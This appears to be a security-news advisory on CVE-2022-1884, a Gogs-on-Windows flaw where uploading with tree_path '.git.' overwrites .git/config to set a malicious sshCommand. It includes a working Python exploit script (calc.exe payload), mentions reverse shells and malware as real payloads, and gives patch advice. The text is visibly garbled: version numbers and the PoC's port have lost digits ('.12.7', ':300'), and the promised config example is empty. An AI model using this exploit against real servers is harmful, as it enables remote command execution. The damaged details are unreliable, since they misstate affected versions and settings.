CVE CyberSecurity Database News

CVE-2022-1884 - Remote Command Execution in Gogs ≤.12.7 on Windows via Malicious File Upload

Poster -

CVE-2022-1884 is a serious vulnerability discovered in Gogs, a popular self-hosted Git service. Found in all versions up to and including .12.7 when installed on Windows servers, this flaw allows remote attackers to execute commands on the server. This post dives deep into how the vulnerability works, real-world exploitation, and how you can protect your server.

[References](#references)

Affected Software: Gogs ≤ .12.7 (Windows only)

- CVE Number: CVE-2022-1884

Result: Remote command execution as the Gogs process user

2. How the Vulnerability Works

When handling file uploads (for example, via the web interface), Gogs lets users specify a destination directory using the tree_path parameter. Normally, this should be sanitized so users can’t access internal directories. However, on Windows, a crafted path (like .git.) will resolve to the real .git folder because Windows ignores a trailing dot in filenames.

This means an attacker can upload files directly into the repository’s .git directory, including .git/config. If they overwrite or append a malicious [core] sshCommand directive, Gogs will execute arbitrary commands next time it interacts with the repo using SSH.

The sshCommand option was intended for advanced Git use, but in this context, it lets attackers run any command—a classic remote command execution (RCE) vector.


Authentication: The attacker logs in to Gogs (registered user required).

2. Create/upload file: They use the "upload file" feature to upload a fake config file, supplying tree_path=.git. as the target directory.
3. Overwrite config: The attacker’s file payload overwrites or adds a malicious [core] section to .git/config, such as:

`

4. Trigger action: The attacker performs an action that causes Gogs to use Git over SSH for this repository (e.g., pushing or pulling).
5. Execution: Gogs calls Git, which uses the compromised .git/config. The specified command runs on the server.


4. Code Snippet: Proof of Concept

Below is a simple Python POC script demonstrating how to upload a malicious config file into a Gogs repository’s .git directory using the vulnerable tree_path parameter.

import requests

GOGS_URL = "http://target-gogs-server:300";
USERNAME = "attacker"
PASSWORD = "password"
REPO_OWNER = "attacker"
REPO_NAME = "victim-repo"

# Step 1: Login and get session
session = requests.Session()
login_data = {"user_name": USERNAME, "password": PASSWORD}
r = session.post(f"{GOGS_URL}/user/login", data=login_data)

if r.ok:
    print("[+] Logged in successfully")

    # Step 2: Prepare malicious .git/config file payload
    files = {
        'file': ('config', b'[core]\nsshCommand = calc.exe\n')  # Change payload as needed
    }
    data = {
        'commit_summary': 'Malicious commit',
        'tree_path': '.git.',  # Exploit the vulnerability!
    }

    # Step 3: Upload malicious config
    upload_url = f"{GOGS_URL}/{REPO_OWNER}/{REPO_NAME}/upload/master"
    r = session.post(upload_url, data=data, files=files)

    if r.ok:
        print("[+] Malicious .git/config uploaded.")
    else:
        print("[-] Upload failed.")

else:
    print("[-] Login failed.")

Note: This will open Calculator as a simple demonstration. In a real attack, the payload could download & execute malware, open a reverse shell, etc.


5. Mitigation & Patches

Status: Fixed in Gogs v.12.8.

Upgrade: Update your Gogs installation to v.12.8 or later.

- Temporary Workaround: Restrict upload access to trusted users, and block file uploads in shared or public instances if possible.

Official Patch:
Gogs team updated input sanitization for tree_path, and blocks access to the .git directory via file uploads.


6. References

- CVE-2022-1884 NVD Record
- Gogs Security Release v.12.8
- Git configuration option: core.sshCommand
- Original Issue Report

Conclusion

CVE-2022-1884 is a reminder of how small oversights in input validation—especially around file paths on Windows—can create major risks. If you run Gogs on Windows, upgrade now. File uploads and repository configurations must always be treated as potential attack vectors!

Share this to help your fellow sysadmins and never assume a trailing dot is harmless!

Timeline

Published on: 11/15/2024 11:15:07 UTC
Last modified on: 11/15/2024 20:35:02 UTC